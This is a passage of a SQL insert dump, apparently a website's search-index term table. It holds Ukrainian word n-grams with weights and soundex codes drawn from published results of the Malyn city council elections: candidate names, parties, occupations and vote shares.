13,22 2','39 13,22 2',0,1,1.3333,'',1,'*'),(1626192,'4 11.76','4 11.76',0,1,1.2333,'',1,'*'),(1626193,'4 11.76 політична','4 11.76 політична',0,1,1.5667,'п000',1,'*'),(1626194,'4 11.76 тво','4 11.76 тво',0,1,1.3667,'т000',1,'*'),(1626195,'4 4','4 4',0,1,1.1,'',1,'*'),(1626196,'4 4 гаєвський','4 4 гаєвський',0,1,1.4333,'г000',1,'*'),(1626197,'4 4 гончаренко','4 4 гончаренко',0,1,1.4667,'г000',1,'*'),(1626198,'4 гаєвський','4 гаєвський',0,1,1.3667,'г000',1,'*'),(1626199,'4 гаєвський петро','4 гаєвський петро',0,1,1.5667,'г000',1,'*'),(1626200,'4 гончаренко','4 гончаренко',0,1,1.4,'г000',1,'*'),(1626201,'4 гончаренко галина','4 гончаренко галина',0,1,1.6333,'г000',1,'*'),(1626202,'4 політична','4 політична',0,1,1.3667,'п000',1,'*'),(1626203,'4 політична партія','4 політична партія',0,1,1.6,'п000',1,'*'),(1626204,'4 савченко','4 савченко',0,1,1.3333,'с000',1,'*'),(1626205,'4 савченко микола','4 савченко микола',0,1,1.5667,'с000',1,'*'),(1626206,'41,69','41,69',0,0,0.5,'',1,'*'),(1626207,'41,69 2','41,69 2',0,1,1.2333,'',1,'*'),(1626208,'41,69 2 2','41,69 2 2',0,1,1.3,'',1,'*'),(1626209,'44,74','44,74',0,0,0.5,'',1,'*'),(1626210,'44,74 1','44,74 1',0,1,1.2333,'',1,'*'),(1626211,'44,74 1 1','44,74 1 1',0,1,1.3,'',1,'*'),(1626212,'44,74 2','44,74 2',0,1,1.2333,'',1,'*'),(1626213,'44,74 2 2','44,74 2 2',0,1,1.3,'',1,'*'),(1626214,'4472','4472',0,0,0.4,'',1,'*'),(1626215,'4472 16','4472 16',0,1,1.2333,'',1,'*'),(1626216,'4472 16 політична','4472 16 політична',0,1,1.5667,'п000',1,'*'),(1626217,'46','46',0,0,0.2,'',1,'*'),(1626218,'46 15,59','46 15,59',0,1,1.2667,'',1,'*'),(1626219,'46 15,59 єбво','46 15,59 єбво',0,1,1.4333,'є000',1,'*'),(1626220,'461','461',0,0,0.3,'',1,'*'),(1626221,'461 0','461 0',0,1,1.1667,'',1,'*'),(1626222,'461 0 політична','461 0 політична',0,1,1.5,'п000',1,'*'),(1626223,'47.06','47.06',0,0,0.5,'',1,'*'),(1626224,'47.06 політична','47.06 політична',0,1,1.5,'п000',1,'*'),(1626225,'47.06 політична партія','47.06 політична партія',0,1,1.7333,'п000',1,'*'),(1626226,'48','48',0,0,0.2,'',1,'*'),(1626227,'48 16,27','48 16,27',0,1,1.2667,'',1,'*'),(1626228,'48 16,27 єбво','48 16,27 єбво',0,1,1.4333,'є000',1,'*'),(1626229,'5 14.71','5 14.71',0,1,1.2333,'',1,'*'),(1626230,'5 14.71 політична','5 14.71 політична',0,1,1.5667,'п000',1,'*'),(1626231,'5 політична','5 політична',0,1,1.3667,'п000',1,'*'),(1626232,'5 політична партія','5 політична партія',0,1,1.6,'п000',1,'*'),(1626233,'527','527',0,0,0.3,'',1,'*'),(1626234,'527 178,64','527 178,64',0,1,1.3333,'',1,'*'),(1626235,'527 178,64 1','527 178,64 1',0,1,1.4,'',1,'*'),(1626236,'55,25','55,25',0,0,0.5,'',1,'*'),(1626237,'55,25 2','55,25 2',0,1,1.2333,'',1,'*'),(1626238,'55,25 2 3','55,25 2 3',0,1,1.3,'',1,'*'),(1626239,'55,59','55,59',0,0,0.5,'',1,'*'),(1626240,'55,59 1','55,59 1',0,1,1.2333,'',1,'*'),(1626241,'55,59 1 1','55,59 1 1',0,1,1.3,'',1,'*'),(1626242,'59','59',0,0,0.2,'',1,'*'),(1626243,'59 20,00','59 20,00',0,1,1.2667,'',1,'*'),(1626244,'59 20,00 єбво','59 20,00 єбво',0,1,1.4333,'є000',1,'*'),(1626245,'6,77','6,77',0,0,0.4,'',1,'*'),(1626246,'6,77 єбво','6,77 єбво',0,1,1.3,'є000',1,'*'),(1626247,'6,77 єбво 1','6,77 єбво 1',0,1,1.3667,'є000',1,'*'),(1626248,'6,77 єбво 3','6,77 єбво 3',0,1,1.3667,'є000',1,'*'),(1626249,'61','61',0,0,0.2,'',1,'*'),(1626250,'61 20,67','61 20,67',0,1,1.2667,'',1,'*'),(1626251,'61 20,67 єбво','61 20,67 єбво',0,1,1.4333,'є000',1,'*'),(1626252,'67','67',0,0,0.2,'',1,'*'),(1626253,'67 22,71','67 22,71',0,1,1.2667,'',1,'*'),(1626254,'67 22,71 2','67 22,71 2',0,1,1.3333,'',1,'*'),(1626255,'68,13','68,13',0,0,0.5,'',1,'*'),(1626256,'68,13 4','68,13 4',0,1,1.2333,'',1,'*'),(1626257,'68,13 4 4','68,13 4 4',0,1,1.3,'',1,'*'),(1626258,'70,16','70,16',0,0,0.5,'',1,'*'),(1626259,'70,16 3','70,16 3',0,1,1.2333,'',1,'*'),(1626260,'70,16 3 3','70,16 3 3',0,1,1.3,'',1,'*'),(1626261,'72,88','72,88',0,0,0.5,'',1,'*'),(1626262,'72,88 3','72,88 3',0,1,1.2333,'',1,'*'),(1626263,'72,88 3 3','72,88 3 3',0,1,1.3,'',1,'*'),(1626264,'73,55','73,55',0,0,0.5,'',1,'*'),(1626265,'73,55 3','73,55 3',0,1,1.2333,'',1,'*'),(1626266,'73,55 3 4','73,55 3 4',0,1,1.3,'',1,'*'),(1626267,'778','778',0,0,0.3,'',1,'*'),(1626268,'778 4','778 4',0,1,1.1667,'',1,'*'),(1626269,'778 4 політична','778 4 політична',0,1,1.5,'п000',1,'*'),(1626270,'78,98','78,98',0,0,0.5,'',1,'*'),(1626271,'78,98 4','78,98 4',0,1,1.2333,'',1,'*'),(1626272,'78,98 4 4','78,98 4 4',0,1,1.3,'',1,'*'),(1626273,'8,81','8,81',0,0,0.4,'',1,'*'),(1626274,'8,81 єбво','8,81 єбво',0,1,1.3,'є000',1,'*'),(1626275,'8,81 єбво 1','8,81 єбво 1',0,1,1.3667,'є000',1,'*'),(1626276,'8,81 єбво 2','8,81 єбво 2',0,1,1.3667,'є000',1,'*'),(1626277,'80,33','80,33',0,0,0.5,'',1,'*'),(1626278,'80,33 4','80,33 4',0,1,1.2333,'',1,'*'),(1626279,'80,33 4 політична','80,33 4 політична',0,1,1.5667,'п000',1,'*'),(1626280,'896','896',0,0,0.3,'',1,'*'),(1626281,'896 4','896 4',0,1,1.1667,'',1,'*'),(1626282,'896 4 політична','896 4 політична',0,1,1.5,'п000',1,'*'),(1626283,'94','94',0,0,0.2,'',1,'*'),(1626284,'94 0','94 0',0,1,1.1333,'',1,'*'),(1626285,'94 0 відомості','94 0 відомості',0,1,1.4667,'в000',1,'*'),(1626286,'97','97',0,0,0.2,'',1,'*'),(1626287,'97 32,88','97 32,88',0,1,1.2667,'',1,'*'),(1626288,'97 32,88 2','97 32,88 2',0,1,1.3333,'',1,'*'),(1626289,'deputati malinskoji','deputati malinskoji',0,1,1.6333,'D135452',1,'*'),(1626290,'deputati malinskoji miskoji','deputati malinskoji miskoji',0,1,1.9,'D13545252',1,'*'),(1626291,'єбво','єбво',0,0,0.2667,'є000',1,'*'),(1626292,'єбво 1','єбво 1',0,1,1.2,'є000',1,'*'),(1626293,'єбво 1 будник','єбво 1 будник',0,1,1.4333,'є000',1,'*'),(1626294,'єбво 1 гуцалюк','єбво 1 гуцалюк',0,1,1.4667,'є000',1,'*'),(1626295,'єбво 1 кисельчук','єбво 1 кисельчук',0,1,1.5333,'є000',1,'*'),(1626296,'єбво 1 майстренко','єбво 1 майстренко',0,1,1.5667,'є000',1,'*'),(1626297,'єбво 1 приходько','єбво 1 приходько',0,1,1.5333,'є000',1,'*'),(1626298,'єбво 1 сніцаренко','єбво 1 сніцаренко',0,1,1.5667,'є000',1,'*'),(1626299,'єбво 1 старжинський','єбво 1 старжинський',0,1,1.6333,'є000',1,'*'),(1626300,'єбво 1 столяр','єбво 1 столяр',0,1,1.4333,'є000',1,'*'),(1626301,'єбво 1 хоменко','єбво 1 хоменко',0,1,1.4667,'є000',1,'*'),(1626302,'єбво 2','єбво 2',0,1,1.2,'є000',1,'*'),(1626303,'єбво 2 бенчук','єбво 2 бенчук',0,1,1.4333,'є000',1,'*'),(1626304,'єбво 2 войтюк','єбво 2 войтюк',0,1,1.4333,'є000',1,'*'),(1626305,'єбво 2 грищенко','єбво 2 грищенко',0,1,1.5,'є000',1,'*'),(1626306,'єбво 2 рудицька','єбво 2 рудицька',0,1,1.5,'є000',1,'*'),(1626307,'єбво 3','єбво 3',0,1,1.2,'є000',1,'*'),(1626308,'єбво 3 лазарчук','єбво 3 лазарчук',0,1,1.5,'є000',1,'*'),(1626309,'єбво політична','єбво політична',0,1,1.4667,'є000',1,'*'),(1626310,'єбво політична партія','єбво політична партія',0,1,1.7,'є000',1,'*'),(1626311,'євгенович громадянин','євгенович громадянин',0,1,1.6667,'є000',1,'*'),(1626312,'євгенович громадянин україни','євгенович громадянин україни',0,1,1.9333,'є000',1,'*'),(1626313,'євдокименко','євдокименко',0,0,0.7333,'є000',1,'*'),(1626314,'євдокименко валерій','євдокименко валерій',0,1,1.6333,'є000',1,'*'),(1626315,'євдокименко валерій петрович','євдокименко валерій петрович',0,1,1.9333,'є000',1,'*'),(1626316,'європейська солідарність 1157','європейська солідарність 1157',0,1,1.9667,'є000',1,'*'),(1626317,'європейська солідарність 5','європейська солідарність 5',0,1,1.8667,'є000',1,'*'),(1626318,'європейська солідарність пенсіонер','європейська солідарність пенсіонер',0,1,2,'є000',1,'*'),(1626319,'європейська солідарність перший','європейська солідарність перший',0,1,2,'є000',1,'*'),(1626320,'європейська солідарність тимчасово','європейська солідарність тимчасово',0,1,2,'є000',1,'*'),(1626321,'європейська солідарність тов','європейська солідарність тов',0,1,1.9333,'є000',1,'*'),(1626322,'іванівна громадянка','іванівна громадянка',0,1,1.6333,'і000',1,'*'),(1626323,'іванівна громадянка україни','іванівна громадянка україни',0,1,1.9,'і000',1,'*'),(1626324,'іванович громадянин','іванович громадянин',0,1,1.6333,'і000',1,'*'),(1626325,'іванович громадянин україни','іванович громадянин україни',0,1,1.9,'і000',1,'*'),(1626326,'ігор євгенович громадянин','ігор євгенович громадянин',0,1,1.8333,'і000',1,'*'),(1626327,'ігор олександрович','ігор олександрович',0,1,1.6,'і000',1,'*'),(1626328,'ігор олександрович громадянин','ігор олександрович громадянин',0,1,1.9667,'і000',1,'*'),(1626329,'інвентаризації','інвентаризації',0,0,0.9333,'і000',1,'*'),(1626330,'інвентаризації начальник','інвентаризації начальник',0,1,1.8,'і000',1,'*'),(1626331,'інвентаризації начальник місце','інвентаризації начальник місце',0,1,2,'і000',1,'*'),(1626332,'інспектор','інспектор',0,0,0.6,'і000',1,'*'),(1626333,'інспектор з','інспектор з',0,1,1.3667,'і000',1,'*'),(1626334,'інспектор з благоустрою','інспектор з благоустрою',0,1,1.7667,'і000',1,'*'),(1626335,'інспектор з онпс','інспектор з онпс',0,1,1.5333,'і000',1,'*'),(1626336,'інспекція','інспекція',0,0,0.6,'і000',1,'*'),(1626337,'інспекція поліського','інспекція поліського',0,1,1.6667,'і000',1,'*'),(1626338,'інспекція поліського округу','інспекція поліського округу',0,1,1.9,'і000',1,'*'),(1626339,'інформаційних','інформаційних',0,0,0.8667,'і000',1,'*'),(1626340,'інформаційних систем','інформаційних систем',0,1,1.6667,'і000',1,'*'),(1626341,'інформаційних систем місце','інформаційних систем місце',0,1,1.8667,'і000',1,'*'),(1626342,'анатоліївна','анатоліївна',0,0,0.7333,'а000',1,'*'),(1626343,'анатоліївна громадянка','анатоліївна громадянка',0,1,1.7333,'а000',1,'*'),(1626344,'анатоліївна громадянка україни','анатоліївна громадянка україни',0,1,2,'а000',1,'*'),(1626345,'анатолійович громадянин','анатолійович громадянин',0,1,1.7667,'а000',1,'*'),(1626346,'анатолійович громадянин україни','анатолійович громадянин україни',0,1,2,'а000',1,'*'),(1626347,'андріївна','андріївна',0,0,0.6,'а000',1,'*'),(1626348,'андріївна громадянка','андріївна громадянка',0,1,1.6667,'а000',1,'*'),(1626349,'андріївна громадянка україни','андріївна громадянка україни',0,1,1.9333,'а000',1,'*'),(1626350,'андрій','андрій',0,0,0.4,'а000',1,'*'),(1626351,'андрій леонідович','андрій леонідович',0,1,1.5667,'а000',1,'*'),(1626352,'андрій леонідович громадянин','андрій леонідович громадянин',0,1,1.9333,'а000',1,'*'),(1626353,'апк директор','апк директор',0,1,1.4,'а000',1,'*'),(1626354,'апк директор місце','апк директор місце',0,1,1.6,'а000',1,'*'),(1626355,'аркадіївна','аркадіївна',0,0,0.6667,'а000',1,'*'),(1626356,'аркадіївна громадянка','аркадіївна громадянка',0,1,1.7,'а000',1,'*'),(1626357,'аркадіївна громадянка україни','аркадіївна громадянка україни',0,1,1.9667,'а000',1,'*'),(1626358,'ат','ат',0,0,0.1333,'а000',1,'*'),(1626359,'ат житомиробленерго','ат житомиробленерго',0,1,1.6333,'а000',1,'*'),(1626360,'ат житомиробленерго юрист','ат житомиробленерго юрист',0,1,1.8333,'а000',1,'*'),(1626361,'ат коростенський','ат коростенський',0,1,1.5333,'а000',1,'*'),(1626362,'ат коростенський кар\'єр','ат коростенський кар',0,1,1.7667,'а000',1,'*'),(1626363,'банкнотного','банкнотного',0,0,0.7333,'б000',1,'*'),(1626364,'банкнотного паперу','банкнотного паперу',0,1,1.6,'б000',1,'*'),(1626365,'банкнотного паперу національного','банкнотного паперу національного',0,1,2,'б000',1,'*'),(1626366,'банку','банку',0,0,0.3333,'б000',1,'*'),(1626367,'банку україни','банку україни',0,1,1.4333,'б000',1,'*'),(1626368,'банку україни головний','банку україни головний',0,1,1.7333,'б000',1,'*'),(1626369,'батьківщина 1252','батьківщина 1252',0,1,1.5333,'б000',1,'*'),(1626370,'батьківщина 1252 5','батьківщина 1252 5',0,1,1.6,'б000',1,'*'),(1626371,'батьківщина 5','батьківщина 5',0,1,1.4333,'б000',1,'*'),(1626372,'батьківщина 5 14.71','батьківщина 5 14.71',0,1,1.6333,'б000',1,'*'),(1626373,'батьківщина виконавчий','батьківщина виконавчий',0,1,1.7333,'б000',1,'*'),(1626374,'батьківщина виконавчий комітет','батьківщина виконавчий комітет',0,1,2,'б000',1,'*'),(1626375,'батьківщина перший','батьківщина перший',0,1,1.6,'б000',1,'*'),(1626376,'батьківщина перший кандидат','батьківщина перший кандидат',0,1,1.9,'б000',1,'*'),(1626377,'батьківщина фоп','батьківщина фоп',0,1,1.5,'б000',1,'*'),(1626378,'батьківщина фоп старжинський','батьківщина фоп старжинський',0,1,1.9333,'б000',1,'*'),(1626379,'батьківщина фоп столяр','батьківщина фоп столяр',0,1,1.7333,'б000',1,'*'),(1626380,'батькові відомості','батькові відомості',0,1,1.6,'б000',1,'*'),(1626381,'батькові відомості про','батькові відомості про',0,1,1.7333,'б000',1,'*'),(1626382,'безпартійна компанія','безпартійна компанія',0,1,1.6667,'б000',1,'*'),(1626383,'безпартійна компанія юнігран','безпартійна компанія юнігран',0,1,1.9333,'б000',1,'*'),(1626384,'безпартійна консультативно','безпартійна консультативно',0,1,1.8667,'б000',1,'*'),(1626385,'безпартійна консультативно діагностична','безпартійна консультативно діагностична',0,1,2,'б000',1,'*'),(1626386,'безпартійна любовицька','безпартійна любовицька',0,1,1.7333,'б000',1,'*'),(1626387,'безпартійна любовицька сільська','безпартійна любовицька сільська',0,1,2,'б000',1,'*'),(1626388,'безпартійна малинівська','безпартійна малинівська',0,1,1.7667,'б000',1,'*'),(1626389,'безпартійна малинівська сільська','безпартійна малинівська сільська',0,1,2,'б000',1,'*'),(1626390,'безпартійна малинський','безпартійна малинський',0,1,1.7333,'б000',1,'*'),(1626391,'безпартійна малинський професійно','безпартійна малинський професійно',0,1,2,'б000',1,'*'),(1626392,'безпартійна малинського','безпартійна малинського',0,1,1.7667,'б000',1,'*'),(1626393,'безпартійна малинського правління','безпартійна малинського правління',0,1,2,'б000',1,'*'),(1626394,'безпартійна тимчасово','безпартійна тимчасово',0,1,1.7,'б000',1,'*'),(1626395,'безпартійна тимчасово не','безпартійна тимчасово не',0,1,1.8,'б000',1,'*'),(1626396,'безпартійна тов','безпартійна тов',0,1,1.5,'б000',1,'*'),(1626397,'безпартійна тов малин','безпартійна тов малин',0,1,1.7,'б000',1,'*'),(1626398,'безпартійна тов світ-консалт','безпартійна тов світ-консалт',0,1,1.9333,'б000',1,'*'),(1626399,'безпартійний ат','безпартійний ат',0,1,1.5,'б000',1,'*'),(1626400,'безпартійний ат житомиробленерго','безпартійний ат житомиробленерго',0,1,2,'б000',1,'*'),(1626401,'безпартійний ат коростенський','безпартійний ат коростенський',0,1,1.9667,'б000',1,'*'),(1626402,'безпартійний державна','безпартійний державна',0,1,1.7,'б000',1,'*'),(1626403,'безпартійний державна екологічна','безпартійний державна екологічна',0,1,2,'б000',1,'*'),(1626404,'безпартійний житлово-комунальне','безпартійний житлово-комунальне',0,1,2,'б000',1,'*'),(1626405,'безпартійний житлово-комунальне господарство','безпартійний житлово-комунальне господарство',0,1,2,'б000',1,'*'),(1626406,'безпартійний кп','безпартійний кп',0,1,1.5,'б000',1,'*'),(1626407,'безпартійний кп екоресурс','безпартійний кп екоресурс',0,1,1.8333,'б000',1,'*'),(1626408,'безпартійний малинська','безпартійний малинська',0,1,1.7333,'б000',1,'*'),(1626409,'безпартійний малинська райрада','безпартійний малинська райрада',0,1,2,'б000',1,'*'),(1626410,'безпартійний малинського','безпартійний малинського',0,1,1.8,'б000',1,'*'),(1626411,'безпартійний малинського дп','безпартійний малинського дп',0,1,1.9,'б000',1,'*'),(1626412,'безпартійний пмп','безпартійний пмп',0,1,1.5333,'б000',1,'*'),(1626413,'безпартійний пмп полісся','безпартійний пмп полісся',0,1,1.8,'б000',1,'*'),(1626414,'безпартійний тимчасово','безпартійний тимчасово',0,1,1.7333,'б000',1,'*'),(1626415,'безпартійний тимчасово не','безпартійний тимчасово не',0,1,1.8333,'б000',1,'*'),(1626416,'безпартійний тов папір-мал','безпартійний тов папір-мал',0,1,1.8667,'б000',1,'*'),(1626417,'безпартійний тов юнігран','безпартійний тов юнігран',0,1,1.8,'б000',1,'*'),(1626418,'безпартійний фізична','безпартійний фізична',0,1,1.6667,'б000',1,'*'),(1626419,'безпартійний фізична особа-підприємець','безпартійний фізична особа-підприємець',0,1,2,'б000',1,'*'),(1626420,'безпартійний фабрика','безпартійний фабрика',0,1,1.6667,'б000',1,'*'),(1626421,'безпартійний фабрика банкнотного','безпартійний фабрика банкнотного',0,1,2,'б000',1,'*'),(1626422,'бенчук','бенчук',0,0,0.4,'б000',1,'*'),(1626423,'бенчук андрій','бенчук андрій',0,1,1.4333,'б000',1,'*'),(1626424,'бенчук андрій леонідович','бенчук андрій леонідович',0,1,1.8,'б000',1,'*'),(1626425,'благоустрою місце','благоустрою місце',0,1,1.5667,'б000',1,'*'),(1626426,'благоустрою місце проживання','благоустрою місце проживання',0,1,1.9333,'б000',1,'*'),(1626427,'бухгалтер','бухгалтер',0,0,0.6,'б000',1,'*'),(1626428,'бухгалтер місце','бухгалтер місце',0,1,1.5,'б000',1,'*'),(1626429,'бухгалтер місце проживання','бухгалтер місце проживання',0,1,1.8667,'б000',1,'*'),(1626430,'в якому','в якому',0,1,1.2333,'в000',1,'*'),(1626431,'в якому обрано','в якому обрано',0,1,1.4667,'в000',1,'*'),(1626432,'в\'ячеслав михайлович','в михайлович',0,1,1.6667,'в000',1,'*'),(1626433,'в\'ячеслав михайлович громадянин','в михайлович громадянин',0,1,2,'в000',1,'*'),(1626434,'від квоти','від квоти',0,1,1.3,'в000',1,'*'),(1626435,'від квоти виборчий','від квоти виборчий',0,1,1.6,'в000',1,'*'),(1626436,'відділу супроводження','відділу супроводження',0,1,1.7,'в000',1,'*'),(1626437,'відділу супроводження інформаційних','відділу супроводження інформаційних',0,1,2,'в000',1,'*'),(1626438,'відзагального','відзагального',0,0,0.8667,'в000',1,'*'),(1626439,'відзагального складу','відзагального складу',0,1,1.6667,'в000',1,'*'),(1626440,'відзагального складу ради','відзагального складу ради',0,1,1.8333,'в000',1,'*'),(1626441,'відомості про обраних','відомості про обраних',0,1,1.7,'в000',1,'*'),(1626442,'відомості про результати','відомості про результати',0,1,1.8,'в000',1,'*'),(1626443,'відповідних','відповідних',0,0,0.7333,'в000',1,'*'),(1626444,'відповідних виборах','відповідних виборах',0,1,1.6333,'в000',1,'*'),(1626445,'відповідних виборах 34','відповідних виборах 34',0,1,1.7333,'в000',1,'*'),(1626446,'відсоток','відсоток',0,0,0.5333,'в000',1,'*'),(1626447,'відсоток відзагального','відсоток відзагального',0,1,1.7333,'в000',1,'*'),(1626448,'відсоток відзагального складу','відсоток відзагального складу',0,1,1.9667,'в000',1,'*'),(1626449,'віктор васильович громадянин','віктор васильович громадянин',0,1,1.9333,'в000',1,'*'),(1626450,'віталій','віталій',0,0,0.4667,'в000',1,'*'),(1626451,'віталій анатолійович','віталій анатолійович',0,1,1.6667,'в000',1,'*'),(1626452,'віталій анатолійович громадянин','віталій анатолійович громадянин',0,1,2,'в000',1,'*'),(1626453,'валентин','валентин',0,0,0.5333,'в000',1,'*'),(1626454,'валентин іванович','валентин іванович',0,1,1.5667,'в000',1,'*'),(1626455,'валентин іванович громадянин','валентин іванович громадянин',0,1,1.9333,'в000',1,'*'),(1626456,'валерій петрович','валерій петрович',0,1,1.5333,'в000',1,'*'),(1626457,'валерій петрович громадянин','валерій петрович громадянин',0,1,1.9,'в000',1,'*'),(1626458,'василівна громадянка','василівна громадянка',0,1,1.6667,'в000',1,'*'),(1626459,'василівна громадянка україни','василівна громадянка україни',0,1,1.9333,'в000',1,'*'),(1626460,'василь петрович','василь петрович',0,1,1.5,'в000',1,'*'),(1626461,'василь петрович громадянин','василь петрович громадянин',0,1,1.8667,'в000',1,'*'),(1626462,'васильович громадянин','васильович громадянин',0,1,1.7,'в000',1,'*'),(1626463,'васильович громадянин україни','васильович громадянин україни',0,1,1.9667,'в000',1,'*'),(1626464,'виборах 34','виборах 34',0,1,1.3333,'в000',1,'*'),(1626465,'виборах 34 кількість','виборах 34 кількість',0,1,1.6667,'в000',1,'*'),(1626466,'виборчий округ в','виборчий округ в',0,1,1.5333,'в000',1,'*'),(1626467,'виконавчий','виконавчий',0,0,0.6667,'в000',1,'*'),(1626468,'виконавчий комітет','виконавчий комітет',0,1,1.6,'в000',1,'*'),(1626469,'виконавчий комітет малинської','виконавчий комітет малинської',0,1,1.9667,'в000',1,'*'),(1626470,'висунула кандидатів','висунула кандидатів',0,1,1.6333,'в000',1,'*'),(1626471,'висунула кандидатів у','висунула кандидатів у',0,1,1.7,'в000',1,'*'),(1626472,'вища безпартійна консультативно','вища безпартійна консультативно',0,1,2,'в000',1,'*'),(1626473,'вища безпартійна любовицька','вища безпартійна любовицька',0,1,1.9,'в000',1,'*'),(1626474,'вища безпартійна малинівська','вища безпартійна малинівська',0,1,1.9333,'в000',1,'*'),(1626475,'вища безпартійна малинський','вища безпартійна малинський',0,1,1.9,'в000',1,'*'),(1626476,'вища безпартійна малинського','вища безпартійна малинського',0,1,1.9333,'в000',1,'*'),(1626477,'вища безпартійна тимчасово','вища безпартійна тимчасово',0,1,1.8667,'в000',1,'*'),(1626478,'вища безпартійна тов','вища безпартійна тов',0,1,1.6667,'в000',1,'*'),(1626479,'вища безпартійний ат','вища безпартійний ат',0,1,1.6667,'в000',1,'*'),(1626480,'вища безпартійний державна','вища безпартійний державна',0,1,1.8667,'в000',1,'*'),(1626481,'вища безпартійний житлово-комунальне','вища безпартійний житлово-комунальне',0,1,2,'в000',1,'*'),(1626482,'вища безпартійний кп','вища безпартійний кп',0,1,1.6667,'в000',1,'*'),(1626483,'вища безпартійний малинська','вища безпартійний малинська',0,1,1.9,'в000',1,'*'),(1626484,'вища безпартійний малинського','вища безпартійний малинського',0,1,1.9667,'в000',1,'*'),(1626485,'вища безпартійний пмп','вища безпартійний пмп',0,1,1.7,'в000',1,'*'),(1626486,'вища безпартійний тимчасово','вища безпартійний тимчасово',0,1,1.9,'в000',1,'*'),(1626487,'вища безпартійний тов','вища безпартійний тов',0,1,1.7,'в000',1,'*'),(1626488,'вища безпартійний фізична','вища безпартійний фізична',0,1,1.8333,'в000',1,'*'),(1626489,'вища безпартійний фабрика','вища безпартійний фабрика',0,1,1.8333,'в000',1,'*'),(1626490,'вища член','вища член',0,1,1.3,'в000',1,'*'),(1626491,'вища член політичної','вища член політичної',0,1,1.6667,'в000',1,'*'),(1626492,'войтюк','войтюк',0,0,0.4,'в000',1,'*'),(1626493,'войтюк оксана','войтюк оксана',0,1,1.4333,'в000',1,'*'),(1626494,'войтюк оксана романівна','войтюк оксана романівна',0,1,1.7667,'в000',1,'*'),(1626495,'володимирівна громадянка','володимирівна громадянка',0,1,1.8,'в000',1,'*'),(1626496,'володимирівна громадянка україни','володимирівна громадянка україни',0,1,2,'в000',1,'*'),(1626497,'володимирович громадянин','володимирович громадянин',0,1,1.8,'в000',1,'*'),(1626498,'володимирович громадянин україни','володимирович громадянин україни',0,1,2,'в000',1,'*'),(1626499,'всеукраїнське об\'єднання свобода','всеукраїнське об свобода',0,1,2,'в000',1,'*'),(1626500,'вячеслав','вячеслав',0,0,0.5333,'в000',1,'*'),(1626501,'вячеслав миколайович','вячеслав миколайович',0,1,1.6667,'в000',1,'*'),(1626502,'вячеслав миколайович громадянин','вячеслав миколайович громадянин',0,1,2,'в000',1,'*'),(1626503,'гірничого','гірничого',0,0,0.6,'г000',1,'*'),(1626504,'гірничого цеху','гірничого цеху',0,1,1.4667,'г000',1,'*'),(1626505,'гірничого цеху місце','гірничого цеху місце',0,1,1.6667,'г000',1,'*'),(1626506,'гаєвський','гаєвський',0,0,0.6,'г000',1,'*'),(1626507,'гаєвський петро','гаєвський петро',0,1,1.5,'г000',1,'*'),(1626508,'гаєвський петро петрович','гаєвський петро петрович',0,1,1.8,'г000',1,'*'),(1626509,'галина аркадіївна','галина аркадіївна',0,1,1.5667,'г000',1,'*'),(1626510,'галина аркадіївна громадянка','галина аркадіївна громадянка',0,1,1.9333,'г000',1,'*'),(1626511,'генеральний','генеральний',0,0,0.7333,'г000',1,'*'),(1626512,'генеральний директор','генеральний директор',0,1,1.6667,'г000',1,'*'),(1626513,'генеральний директор місце','генеральний директор місце',0,1,1.8667,'г000',1,'*'),(1626514,'генерального','генерального',0,0,0.8,'г000',1,'*'),(1626515,'генерального директора','генерального директора',0,1,1.7333,'г000',1,'*'),(1626516,'генерального директора місце','генерального директора місце',0,1,1.9333,'г000',1,'*'),(1626517,'голови місце','голови місце',0,1,1.4,'г000',1,'*'),(1626518,'голови місце проживання','голови місце проживання',0,1,1.7667,'г000',1,'*'),(1626519,'головний бухгалтер','головний бухгалтер',0,1,1.6,'г000',1,'*'),(1626520,'головний бухгалтер місце','головний бухгалтер місце',0,1,1.8,'г000',1,'*'),(1626521,'головний енергетик','головний енергетик',0,1,1.6,'г000',1,'*'),(1626522,'головний енергетик місце','головний енергетик місце',0,1,1.8,'г000',1,'*'),(1626523,'головний спеціаліст','головний спеціаліст',0,1,1.6333,'г000',1,'*'),(1626524,'головний спеціаліст відділу','головний спеціаліст відділу',0,1,1.9,'г000',1,'*'),(1626525,'голос 186','голос 186',0,1,1.3,'г000',1,'*'),(1626526,'голос 186 0','голос 186 0',0,1,1.3667,'г000',1,'*'),(1626527,'голосів','голосів',0,0,0.4667,'г000',1,'*'),(1626528,'голосів за','голосів за',0,1,1.3333,'г000',1,'*'),(1626529,'голосів за від','голосів за від',0,1,1.4667,'г000',1,'*'),(1626530,'голосів поданих','голосів поданих',0,1,1.5,'г000',1,'*'),(1626531,'голосів поданих за','голосів поданих за',0,1,1.6,'г000',1,'*'),(1626532,'голосування назва','голосування назва',0,1,1.5667,'г000',1,'*'),(1626533,'голосування назва політичної','голосування назва політичної',0,1,1.9333,'г000',1,'*'),(1626534,'гончаренко','гончаренко',0,0,0.6667,'г000',1,'*'),(1626535,'гончаренко галина','гончаренко галина',0,1,1.5667,'г000',1,'*'),(1626536,'гончаренко галина аркадіївна','гончаренко галина аркадіївна',0,1,1.9333,'г000',1,'*'),(1626537,'господарство інспектор','господарство інспектор',0,1,1.7333,'г000',1,'*'),(1626538,'господарство інспектор з','господарство інспектор з',0,1,1.8,'г000',1,'*'),(1626539,'гранітне','гранітне',0,0,0.5333,'г000',1,'*'),(1626540,'гранітне коростенський','гранітне коростенський',0,1,1.7333,'г000',1,'*'),(1626541,'гранітне коростенський р-н','гранітне коростенський р-н',0,1,1.8667,'г000',1,'*'),(1626542,'григорович','григорович',0,0,0.6667,'г000',1,'*'),(1626543,'григорович громадянин','григорович громадянин',0,1,1.7,'г000',1,'*'),(1626544,'григорович громадянин україни','григорович громадянин україни',0,1,1.9667,'г000',1,'*'),(1626545,'григорович громадянинукраїни','григорович громадянинукраїни',0,1,1.9333,'г000',1,'*'),(1626546,'григорович громадянинукраїни народився','григорович громадянинукраїни народився',0,1,2,'г000',1,'*'),(1626547,'грищенко вячеслав','грищенко вячеслав',0,1,1.5667,'г000',1,'*'),(1626548,'грищенко вячеслав миколайович','грищенко вячеслав миколайович',0,1,1.9667,'г000',1,'*'),(1626549,'громадсько-політична','громадсько-політична',0,0,1,'г000',1,'*'),(1626550,'громадсько-політична платформа','громадсько-політична платформа',0,1,2,'г000',1,'*'),(1626551,'громадсько-політична платформа надії','громадсько-політична платформа надії',0,1,2,'г000',1,'*'),(1626552,'громадянинукраїни','громадянинукраїни',0,0,1,'г000',1,'*'),(1626553,'громадянинукраїни народився','громадянинукраїни народився',0,1,1.9,'г000',1,'*'),(1626554,'громадянинукраїни народився 17.08.1986','громадянинукраїни народився 